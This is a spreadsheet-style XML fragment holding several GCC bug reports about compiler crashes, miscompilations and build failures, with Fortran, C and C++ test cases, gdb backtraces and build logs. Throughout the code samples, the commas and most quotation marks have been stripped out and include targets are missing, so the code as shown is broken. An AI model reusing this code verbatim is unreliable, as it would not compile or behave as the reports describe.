    <t>GCC-33250</t>
  </si>
  <si>
    <t>[Regression 4.3] bus error compiling dqelg.f in scipy on intel mac</t>
  </si>
  <si>
    <t>During gfortran compilation of the integration subpack of scipy-0.5.2.1 gfortran fails with an internal compiler error: Bus error when trying to compile dqelg.f.
Command line and error info:
gfortran:f77: Lib/integrate/quadpack/dqelg.f
Lib/integrate/quadpack/dqelg.f: In function 'dqelg':
Lib/integrate/quadpack/dqelg.f:1: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Lib/integrate/quadpack/dqelg.f: In function 'dqelg':
Lib/integrate/quadpack/dqelg.f:1: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
error: Command /usr/local/bin/gfortran -Wall -ffixed-form -fno-second-underscore -fPIC -O3 -funroll-loops -c -c Lib/integrate/quadpack/dqelg.f -o build/temp.macosx-10.4-i386-2.5/Lib/integrate/quadpack/dqelg.o failed with exit status 1
vpn1-client-a35:/usr/local/src/scipy-0.5.2.1 claumann$ indqelggfortran -v
-bash: indqelggfortran: command not found
vpn1-client-a35:/usr/local/src/scipy-0.5.2.1 claumann$ gfortran -v
Using built-in specs.
Target: i386-apple-darwin8.10.1
Configured with: ../gcc-4.3-20070810/configure --enable-threads=posix --enable-languages=fortran
Thread model: posix
gcc version 4.3.0 20070810 (experimental)
Fortran code (dqelg.f):
      subroutine dqelg(nepstabresultabserrres3lanres)
c***begin prologue  dqelg
c***refer to  dqagiedqagoedqagpedqagse
c***routines called  d1mach
c***revision date  830518   (yymmdd)
c***keywords  epsilon algorithm convergence acceleration
c             extrapolation
c***author  piessensrobertappl. math. &amp; progr. div. - k.u.leuven
c           de donckereliseappl. math &amp; progr. div. - k.u.leuven
c***purpose  the routine determines the limit of a given sequence of
c            approximations by means of the epsilon algorithm of
c            p.wynn. an estimate of the absolute error is also given.
c            the condensed epsilon table is computed. only those
c            elements needed for the computation of the next diagonal
c            are preserved.
c***description
c
c           epsilon algorithm
c           standard fortran subroutine
c           double precision version
c
c           parameters
c              n      - integer
c                       epstab(n) contains the new element in the
c                       first column of the epsilon table.
c
c              epstab - double precision
c                       vector of dimension 52 containing the elements
c                       of the two lower diagonals of the triangular
c                       epsilon table. the elements are numbered
c                       starting at the right-hand corner of the
c                       triangle.
c
c              result - double precision
c                       resulting approximation to the integral
c
c              abserr - double precision
c                       estimate of the absolute error computed from
c                       result and the 3 previous results
c
c              res3la - double precision
c                       vector of dimension 3 containing the last 3
c                       results
c
c              nres   - integer
c                       number of calls to the routine
c                       (should be zero at first call)
c
c***end prologue  dqelg
c
      double precision abserrdabsdelta1delta2delta3dmax1d1mach
     *  epmachepsinfepstaberrorerr1err2err3e0e1e1abse2e3
     *  oflowresresultres3lasstol1tol2tol3
      integer iibib2ieindxk1k2k3limexpnnewelmnresnum
      dimension epstab(52)res3la(3)
c
c           list of major variables
c           -----------------------
c
c           e0     - the 4 elements on which the computation of a new
c           e1       element in the epsilon table is based
c           e2
c           e3                 e0
c                        e3    e1    new
c                              e2
c           newelm - number of elements to be computed in the new
c                    diagonal
c           error  - error = abs(e1-e0)+abs(e2-e1)+abs(new-e2)
c           result - the element in the new diagonal with least value
c                    of error
c
c           machine dependent constants
c           ---------------------------
c
c           epmach is the largest relative spacing.
c           oflow is the largest positive magnitude.
c           limexp is the maximum number of elements the epsilon
c           table can contain. if this number is reached the upper
c           diagonal of the epsilon table is deleted.
c
c***first executable statement  dqelg
      epmach = d1mach(4)
      oflow = d1mach(2)
      nres = nres+1
      abserr = oflow
      result = epstab(n)
      if(n.lt.3) go to 100
      limexp = 50
      epstab(n+2) = epstab(n)
      newelm = (n-1)/2
      epstab(n) = oflow
      num = n
      k1 = n
      do 40 i = 1newelm
        k2 = k1-1
        k3 = k1-2
        res = epstab(k1+2)
        e0 = epstab(k3)
        e1 = epstab(k2)
        e2 = res
        e1abs = dabs(e1)
        delta2 = e2-e1
        err2 = dabs(delta2)
        tol2 = dmax1(dabs(e2)e1abs)*epmach
        delta3 = e1-e0
        err3 = dabs(delta3)
        tol3 = dmax1(e1absdabs(e0))*epmach
        if(err2.gt.tol2.or.err3.gt.tol3) go to 10
c
c           if e0 e1 and e2 are equal to within machine
c           accuracy convergence is assumed.
c           result = e2
c           abserr = abs(e1-e0)+abs(e2-e1)
c
        result = res
        abserr = err2+err3
c ***jump out of do-loop
        go to 100
   10   e3 = epstab(k1)
        epstab(k1) = e1
        delta1 = e1-e3
        err1 = dabs(delta1)
        tol1 = dmax1(e1absdabs(e3))*epmach
c
c           if two elements are very close to each other omit
c           a part of the table by adjusting the value of n
c
        if(err1.le.tol1.or.err2.le.tol2.or.err3.le.tol3) go to 20
        ss = 0.1d+01/delta1+0.1d+01/delta2-0.1d+01/delta3
        epsinf = dabs(ss*e1)
c
c           test to detect irregular behaviour in the table and
c           eventually omit a part of the table adjusting the value
c           of n.
c
        if(epsinf.gt.0.1d-03) go to 30
   20   n = i+i-1
c ***jump out of do-loop
        go to 50
c
c           compute a new element and eventually adjust
c           the value of result.
c
   30   res = e1+0.1d+01/ss
        epstab(k1) = res
        k1 = k1-2
        error = err2+dabs(res-e2)+err3
        if(error.gt.abserr) go to 40
        abserr = error
        result = res
   40 continue
c
c           shift the table.
c
   50 if(n.eq.limexp) n = 2*(limexp/2)-1
      ib = 1
      if((num/2)*2.eq.num) ib = 2
      ie = newelm+1
      do 60 i=1ie
        ib2 = ib+2
        epstab(ib) = epstab(ib2)
        ib = ib2
   60 continue
      if(num.eq.n) go to 80
      indx = num-n+1
      do 70 i = 1n
        epstab(i)= epstab(indx)
        indx = indx+1
   70 continue
   80 if(nres.ge.4) go to 90
      res3la(nres) = result
      abserr = oflow
      go to 100
c
c           compute error estimate
c
   90 abserr = dabs(result-res3la(3))+dabs(result-res3la(2))
     *  +dabs(result-res3la(1))
      res3la(1) = res3la(2)
      res3la(2) = res3la(3)
      res3la(3) = result
  100 abserr = dmax1(abserr0.5d+01*epmach*dabs(result))
      return
      end</t>
  </si>
  <si>
    <t>claumann</t>
  </si>
  <si>
    <t>GCC-44869</t>
  </si>
  <si>
    <t>[OOP] generic TBPs not initialized properly</t>
  </si>
  <si>
    <t>Reported by Satish.BD at http://gcc.gnu.org/ml/fortran/2010-07/msg00059.html
The shown (cf. URL) program compiles without any errors but segfaults when at run time.
Two of my other compiles diagnosed the following failure (gfortran not):
- In line 220 the access to tst_case =&gt; self%list requires a TARGET attribute for self (which is not diagnosed in gfortran). Ditto for lines 231 and 245.
One compiler additionally complained that for
-     call suite%add(first_test test_a)
  and call self%assert(12 1233  generic_tbp.f90 purposely failed)
  no specific subprogram could be found  (I have not checked this)
The other compiler compiles and the resulting program does not segfault but prints:
FFFF
We have    4 failure(s).
   1) first_test: generic_tbp.f90:1233 purposely failed: expected  but was 
   2) second_test: generic_tbp.f90: 324 purposely passed: expected  but was 
   3) third_test: generic_tbp.f90:1233 purposely failed: expected  but was 
   4) last_test: generic_tbp.f90: 324 purposely passed: expected  but was 
     !!! FAILURES !!!
Runs:       4
Passes:     0
Fails:      4</t>
  </si>
  <si>
    <t>GCC-5362</t>
  </si>
  <si>
    <t>Undocumented target options</t>
  </si>
  <si>
    <t>The following targets have target options but no documentation of them
in invoke.texi:
1750a
dsp16xx
elxsi
fr30
i370
i860
pj
(stormy16's undocumentedness is already the subject of a separate PR.
we32k has no target options at all.)
Release:
3.1 20020111
Environment:
System: Linux digraph 2.2.20 #2 Sat Nov 10 16:44:22 UTC 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-cvs/configure --prefix=/opt/gcc/mainline --disable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Look for documentation of the target options of these targets.</t>
  </si>
  <si>
    <t>GCC-33810</t>
  </si>
  <si>
    <t>[4.1 Regression] gcc 4.1.2 mangles results on x86_64 in bitfield operations</t>
  </si>
  <si>
    <t>Run the test case on a x86_64 bit machine to see how gcc 4.1.2 mangles results in under Linux
We have tested the test case using 3.2.3 Compiler on RHEL 3 on both 32 as well as 64 bit OS it works well.
Compile the test case provided with the following steps
$gcc -g -I. -Wall -m64 -c bar.c
$g++ -g -I. -Wall -m64 -o foo foo.c bar.o
Actual results: once you run the program foo you will see the following result
foo: i is 3.
bar: i is 3221205968.
Expected results:
foo: i is 3.
bar: i is 3.
Additional info: Test Case follows
----- bar.h -----
typedef struct {
 unsigned b1:16
 unsigned b2:16
} foo
#ifdef   __cplusplus
extern C
{
#endif
foo bar(unsigned)
#ifdef   __cplusplus
}
#endif
----- bar.c -----
#include 
#include 
foo bar(unsigned i)
{
 foo myfoo
 myfoo.b1=myfoo.b2=0
 printf(bar: i is %u.\ni)
 return(myfoo)
}
----- foo.c -----
#include 
#include 
int main(void)
{
 foo myfoo
 unsigned i = 3
 printf(foo: i is %u.\ni)
 myfoo = bar(i)
 return 0
}</t>
  </si>
  <si>
    <t>GCC-48165</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] gcc-4.6: internal compiler error: in build2_stat</t>
  </si>
  <si>
    <t>gcc-4.6 and trunk (rev. 171047) throw an internal compiler error.
$ g++ -O2 -c t.cpp
t.cpp: In function â€˜void bar(void*)â€™:
t.cpp:31:6: internal compiler error: in build2_stat at tree.c:3799
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-O0 runs fine
platform: linux x86_64 but probably platform-independent
source t.cpp:
typedef long unsigned int size_t
extern C {
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) void *
memcpy (void *__restrict __dest __const void *__restrict __src size_t __len) throw ()
{
  return __builtin___memcpy_chk (__dest __src __len __builtin_object_size (__dest 0))
}
}
typedef char TCODE[20]
typedef TCODE TCODE_ARRAY[5]
typedef struct PARAM
{
  TCODE_ARRAY tcode
} PARAM
static void foo (void* p)
{
  char buffer[4+sizeof(PARAM)]
  PARAM *param = (PARAM *)(buffer + 4)
  int i
  for (i=0 i &lt; 5 i++)
    {
      memcpy( param-&gt;tcode[i] p 20 )
    }
}
void bar (void* p)
{
  foo (p)
}</t>
  </si>
  <si>
    <t>GCC-68624</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -O2 and -O3 on x86_64-linux-gnu (in 64-bit mode)</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux-gnu at -O2 and -O3 in the 64-bit mode (but not in the 32-bit mode). 
This is a regression from 5.2.x. 
Perhaps to do with VRP as -fno-tree-vrp seems to fix the miscompilation. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151130 (experimental) [trunk revision 231056] (GCC) 
$ 
$ gcc-trunk -m64 -Os small.c ./a.out
$ gcc-trunk -m32 -O2 small.c ./a.out
$ gcc-trunk -m64 -O2 -fno-tree-vrp small.c ./a.out
$ gcc-5.2 -m64 -O2 small.c ./a.out
$ 
$ gcc-trunk -m64 -O2 small.c
$ ./a.out
Aborted (core dumped)
$ 
---------------------------------
int b c d e = 1 f g h j
static int
fn1 ()
{
  int a = c
  if (h)
    return 9
  g = (c || b) % e
  if ((g || f) &amp;&amp; b)
    return 9
  e = d
  for (c = 0 c &gt; -4 c--)
  if (d)
    c--
  j = c
  return d
}
int
main ()
{
  fn1 ()
  if (c != -4) 
    __builtin_abort () 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-47736</t>
  </si>
  <si>
    <t>[4.6 Regression] libquadmath build broken with pre-2.10 glibc</t>
  </si>
  <si>
    <t>Bootstrap on x86_64-unknown-linux-gnu with glibc 2.7 (Ubuntu 8.04 LTS) fails with:
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c: In function 'quadmath_snprintf':
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c:220:7: error: 'struct printf_info' has no member named 'user'
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c: In function 'flt128_ais':
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c:288:11: error: 'const struct printf_info' has no member named 'user'
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c: In function 'flt128_printf_fp':
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c:367:12: error: 'const struct printf_info' has no member named 'user'
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c: In function 'flt128_printf_fphex':
/scratch/joseph/fsf/gcc-mainline/libquadmath/printf/quadmath-printf.c:380:12: error: 'const struct printf_info' has no member named 'user'
It appears that this member was new in glibc 2.10 and so configure checks or version checks are needed to avoid requiring it when building with older glibc.</t>
  </si>
  <si>
    <t>GCC-57184</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in expand_expr_real_1 at expr.c:10478</t>
  </si>
  <si>
    <t>Created attachment 30038
testcase
With 4.8.0 20130502 I get an ICE when compiling the attached test case but only with -g and some optimization (-O{s123}).</t>
  </si>
  <si>
    <t>GCC-64231</t>
  </si>
  <si>
    <t>[5 Regression] SIGSEGV building glibc on aarch64-linux-gnu from r217852</t>
  </si>
  <si>
    <t>I have an aarch64-linux-gnu build tree with a glibc checkout from about a month ago (revision 1400983e04d7b4b5a92db79ab27b0d0ec7d8bdef) that has started giving a SEGV when building argp/argp-help.c.  I tracked it down to this GCC commit:
r217852 | belagod | 2014-11-20 05:58:23 -0800 (Thu 20 Nov 2014) | 17 lines
2014-11-20  Tejas Belagod  
gcc/
	* config/aarch64/aarch64-protos.h (aarch64_classify_symbol):
	Fixup prototype.
	* config/aarch64/aarch64.c (aarch64_expand_mov_immediate
	aarch64_cannot_force_const_mem aarch64_classify_address
	aarch64_classify_symbolic_expression): Fixup call to
	aarch64_classify_symbol.
	(aarch64_classify_symbol): Add range-checking for
	symbol + offset addressing for tiny and small models.
testsuite/
         * gcc.target/aarch64/symbol-range.c: New.
         * gcc.target/aarch64/symbol-range-tiny.c: New.
Here's the info from running the debugger on cc1.
Program received signal SIGSEGV Segmentation fault.
plus_constant (mode=DImode x=0xf78e1f30 c=144 inplace= 
    inplace@entry=false)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/explow.c:120
120		  if (memory_address_p (GET_MODE (tem) XEXP (tem 0)))
(gdb) print debug_rtx(x)
(mem/u/c:DI (symbol_ref/u:DI (*.LC39) [flags 0x2]) [4  S8 A64])
$6 = void
(gdb) print tem
$7 = (rtx) 0x0
(gdb) bt
#0  plus_constant (mode=DImode x=0xf78e1f30 c=144 inplace= 
    inplace@entry=false)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/explow.c:120
#1  0x082e2db3 in init_alias_analysis ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/alias.c:2966
#2  0x08b59682 in cse_main (nregs= f=)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cse.c:6597
#3  0x08b5a5ec in rest_of_handle_cse2 ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cse.c:7528
#4  (anonymous namespace)::pass_cse2::execute (this=0x92c99c8)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cse.c:7581
#5  0x0868ca49 in execute_one_pass (pass=pass@entry=0x92c99c8)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/passes.c:2311
#6  0x0868cf16 in execute_pass_list_1 (pass=0x92c99c8)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/passes.c:2363
#7  0x0868cf26 in execute_pass_list_1 (pass=0x92c93c8 pass@entry=0x92c7288)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/passes.c:2364
#8  0x0868cf72 in execute_pass_list (fn=0xf7933dac pass=0x92c7288)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/passes.c:2374
#9  0x08367a5d in cgraph_node::expand (this=this@entry=0xf794cd20)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cgraphunit.c:1773
#10 0x083692ff in expand_all_functions ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cgraphunit.c:1909
#11 symbol_table::compile (this=this@entry=0xf7c3b000)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cgraphunit.c:2263
#12 0x0836ae3d in symbol_table::finalize_compilation_unit (this=0xf7c3b000)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/cgraphunit.c:2340
#13 0x081ec3a4 in c_write_global_declarations ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/c/c-decl.c:10777
#14 0x0874fdce in compile_file ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/toplev.c:584
#15 0x081d1823 in do_compile ()
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/toplev.c:2041
#16 toplev::main (this=this@entry=0xffffcfff argc=argc@entry=103 
    argv=argv@entry=0xffffd0b4)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/toplev.c:2138
#17 0x081d2175 in main (argc=103 argv=0xffffd0b4)
    at /scratch/sandra/aarch64-fsf/src/gcc-mainline/gcc/main.c:38
Hopefully this is enough info to track it down?  Seems clear that something in the bad patch started causing force_const_mem to return NULL in this case and the call site in plus_mem is not expecting that.</t>
  </si>
  <si>
    <t>GCC-30460</t>
  </si>
  <si>
    <t>[4.2 Regression] asm_debug is not initialized in gcc.c when using a default specs file</t>
  </si>
  <si>
    <t>asm_debug is not initialized in gcc.c. This can lead to a sigsegv when using a custom specs file that does not overwrite asm_debug but other predefined spec values.
Example:
---
*invoke_as:
%{!S:-o %|.s |
 nesc-as %(asm_options) %m.s %A }
---</t>
  </si>
  <si>
    <t>GCC-28320</t>
  </si>
  <si>
    <t>bootstrap failure in libstdc++-v3</t>
  </si>
  <si>
    <t>/opt/build/eric/gcc-4_1-branch/./gcc/xgcc -shared-libgcc -B/opt/build/eric/gcc-4_1-branch/./gcc -nostdinc++ -L/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3/src -L/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3/src/.libs -B/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/bin/ -B/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/lib/ -isystem /opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/include -isystem /opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/sys-include -I/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3/include/ia64-hp-hpux11.23 -I/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3/include -I/home/eric/svn/gcc-4_1-branch/libstdc++-v3/libsupc++ -g -O2 -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -c c++locale.cc  -fPIC-DPIC -o .libs/c++locale.o
/usr/include/errno.h:39: error: previous declaration of 'int errno' with 'C++' linkage
/usr/include/sys/errno.h:52: error: conflicts with new declaration with 'C' linkage
gmake[4]: *** [c++locale.lo] Error 1
gmake[4]: Leaving directory `/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3/src'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory `/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/opt/build/eric/gcc-4_1-branch/ia64-hp-hpux11.23/libstdc++-v3'
gmake[1]: *** [all-target-libstdc++-v3] Error 2
gmake[1]: Leaving directory `/opt/build/eric/gcc-4_1-branch'
gmake: *** [all] Error 2
Last successful bootstrap on Jun 3.</t>
  </si>
  <si>
    <t>GCC-67696</t>
  </si>
  <si>
    <t>libbacktrace prints C++ demangled name for Fortran symbol</t>
  </si>
  <si>
    <t>The backtrace printed on abort can contain demangled names instead of the Fortran symbols. In the example below cp__b becomes cp(bool) :
&gt; cat test.f90
MODULE foo
CONTAINS
  SUBROUTINE cp__b()
     CALL ABORT()
  END SUBROUTINE
END MODULE 
PROGRAM test
USE foo
CALL cp__b()
END PROGRAM
&gt; gfortran -g test.f90  ./a.out
Program aborted. Backtrace:
#0  0x7FE4810C6B87
#1  0x7FE4810C79C2
#2  0x7FE481198538
#3  0x4006A3 in __foo_MOD_cp(bool) at test.f90:4
#4  0x4006AC in test at test.f90:10
Aborted
I actually notice the same wrong name is printed if a backtrace is asked in gdb:
(gdb) bt
#0  0x0000003ba4a32625 in raise () from /lib64/libc.so.6
#1  0x0000003ba4a33e05 in abort () from /lib64/libc.so.6
#2  0x00007ffff7cf99a9 in _gfortrani_sys_abort () at /data/vjoost/toolchain-r15694/build/gcc-5.2.0/libgfortran/runtime/error.c:180
#3  0x00007ffff7dca539 in _gfortran_abort () at /data/vjoost/toolchain-r15694/build/gcc-5.2.0/libgfortran/intrinsics/abort.c:33
#4  0x00000000004006a4 in __foo_MOD_cp(bool) ()
#5  0x00000000004006ad in MAIN__ ()
#6  0x00000000004006e4 in main ()
#7  0x0000003ba4a1ed5d in __libc_start_main () from /lib64/libc.so.6
#8  0x00000000004005a9 in _start ()</t>
  </si>
  <si>
    <t>GCC-30659</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in undefined template</t>
  </si>
  <si>
    <t>mrs2 $ ./xgcc -B./ /tmp/t.ii
/tmp/t.ii:1: error: ISO C++ forbids declaration of 'basic_istream' with no type
/tmp/t.ii:1: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
mrs2 $ cat /tmp/t.ii
extern C { extern template basic_istream</t>
  </si>
  <si>
    <t>GCC-5713</t>
  </si>
  <si>
    <t>Redeclaration causes ice in in make_decl_rtl at varasm.c:835</t>
  </si>
  <si>
    <t>The redeclaration of int i in the following source code tc-bug.C
causes an ice in make_decl_rtl at varasm.c:835.
Release:
3.1 20020216 (experimental)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
SuSE 7.3
GNU ld version 2.11.93.0.2 20020207
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
source code tc-bug.C
int f(const char* const char*){return 1}
void g()
{
  const char* s = hallo
  int i
  int size = 5
  int i = f(s s + size)
}
g++ -v -c tc-bug.C  -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020216 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tc-bug.C -W -Wall tc-bug.ii
GNU CPP version 3.1 20020216 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed tc-bug.ii -quiet -dumpbase tc-bug.C -W -Wall -version -o tc-bug.s
GNU CPP version 3.1 20020216 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020216 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020216 (experimental).
tc-bug.C: In function `void g()':
tc-bug.C:8: redeclaration of `int i'
tc-bug.C:6: `int i' previously declared here
tc-bug.C:8: warning: unused variable `int i'
tc-bug.C:6: Internal compiler error in make_decl_rtl at varasm.c:835
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
tc-bug.ii
# 1 tc-bug.C
# 1 
# 1 
# 1 tc-bug.C
int f(const char* const char*){return 1}
void g()
{
  const char* s = hallo
  int i
  int size = 5
  int i = f(s s + size)
}</t>
  </si>
  <si>
    <t>GCC-64244</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] ICE at class.c:236 when using non_overridable</t>
  </si>
  <si>
    <t>Created attachment 34235
Test program to trigger ICE
This test file (also attached) produces ICE:
$ cat test_non_overridable.f90 
module m
implicit none
type :: A
contains
    generic :: f =&gt; g
    procedure non_overridable :: g
end type
contains
subroutine g(this)
class(A) intent(in) :: this
end subroutine
end module
program test_non_overridable
use m only: A
implicit none
class(A) allocatable :: h
call h%f()
end program
$ gfortran test_non_overridable.f90 
f951: internal compiler error: in gfc_add_component_ref at fortran/class.c:236
0x543cf7 gfc_add_component_ref(gfc_expr* char const*)
	../.././gcc/fortran/class.c:236
0x5b4c07 resolve_typebound_subroutine
	../.././gcc/fortran/resolve.c:5942
0x5b4c07 gfc_resolve_code(gfc_code* gfc_namespace*)
	../.././gcc/fortran/resolve.c:9966
0x5b72aa resolve_codes
	../.././gcc/fortran/resolve.c:14719
0x5b7392 gfc_resolve
	../.././gcc/fortran/resolve.c:14747
0x5a2e5a resolve_all_program_units
	../.././gcc/fortran/parse.c:4886
0x5a2e5a gfc_parse_file()
	../.././gcc/fortran/parse.c:5135
0x5e00f5 gfc_be_parse_file
	../.././gcc/fortran/f95-lang.c:212
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
This affects gfortran 4.9.2 I also tried gfortran 4.7.2 which gives:
$ gfortran test_non_overridable.f90 
f951: internal compiler error: in gfc_add_component_ref at fortran/class.c:209
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
When you remove the non_overridable keyword it compiles. I wasn't able to simplify the test case further.</t>
  </si>
  <si>
    <t>ondrej.certik</t>
  </si>
  <si>
    <t>GCC-52176</t>
  </si>
  <si>
    <t>Valgrind complains about some realloc on assignment to unallocated LHS</t>
  </si>
  <si>
    <t>At revision 184016 the executable for Rouson et al code in chapter08/puppeteer_f2003 passes valgrind without error up to -O. For higher optimization valgrind complains:
==6241== Conditional jump or move depends on uninitialised value(s)
==6241==    at 0x100004E46: MAIN__.2374 (main.F90:95)
==6241==    by 0x10000755E: main (main.F90:27)
this is
      jacobian = identity - 0.5*dt*dRHS_dState
and a lot of
==6153== Conditional jump or move depends on uninitialised value(s)
==6153==    at 0x100005258: __air_module_MOD_coordinate (air.F90:82)
==6153==    by 0x1000070BF: ??? (in ./a.out)
==6153==    by 0x10000728F: ??? (in ./a.out)
==6153==    by 0x1000070BF: ??? (in ./a.out)
==6153==    by 0x100454B8F: ???
==6153==    by 0x1000070BF: ??? (in ./a.out)
==6153==    by 0x208: ???
this is
  ! accessor: returns phase-space coordinates
  function coordinate(this) result(return_x)
    class(air)          intent(in)  :: this
    real  dimension(:) allocatable :: return_x
    return_x = [ this%x this%sigma ]
  end function
Adding
    allocate(return_x(2))
fixes the later errors. Note that running the executable outside valgrind seems to give the right results even with -Ofast -flto.</t>
  </si>
  <si>
    <t>GCC-12705</t>
  </si>
  <si>
    <t>: complex powers</t>
  </si>
  <si>
    <t>wrong results with complex powers :
  COMPLEX ab
  INTEGER i
  a=(0.01.0)
  i=2
  b=a**i
  IF (b.NE.-1.0) CALL ABORT()
  i=4
  b=a**i
  IF (b.NE.1.0) CALL ABORT()
  END</t>
  </si>
  <si>
    <t>GCC-3395</t>
  </si>
  <si>
    <t>Attribute causes type lookup to fail. Regression.</t>
  </si>
  <si>
    <t>[ I had originally attached this file but the attachment
only contains the first paragraph rest goes missing ]
The following code causes the C++ front-end to report errors where
there are none. Regression from 2.95.x and unfortunately causes
most of C++ code that uses/creates windows DLL to fail.
  struct
  __attribute__((dllexport))
  c {
    void f () const
  }
  inline void
  c::f () const
  { }
Here's what cc1plus says:
  $ ./cc1plus -quiet -version dll-bug2.ii
  GNU CPP version 3.0 (cpplib) (80386 BSD syntax)
  GNU C++ version 3.0 (i686-pc-cygwin)
          compiled by GNU C version 3.0.
  dll-bug2.ii:9: prototype for `void c::f() const' does not match any in
  class
     `c'
  dll-bug2.ii:4: candidate is: void c::f() const
The problem happens when parsing the definition of c::f.
PARSER -&gt; ... -&gt; check_classfn -&gt; compparms -&gt; same_type_p returns 0.
See notes marked with &gt;&gt;&gt;&gt; and ^^^^^ below. Putting the attribute *before*
the class/struct causes no errors but that's not consistent with existing
code.
(gdb) b check_classfn
(gdb) run dll-bug2.ii
Starting program: /homes/khan/src/win32/cygwin/BUILD/orig-gcc3/gcc/cc1plus
dll-bug2.ii
Breakpoint 4 check_classfn (ctype=0x401715b0 function=0x40175888)
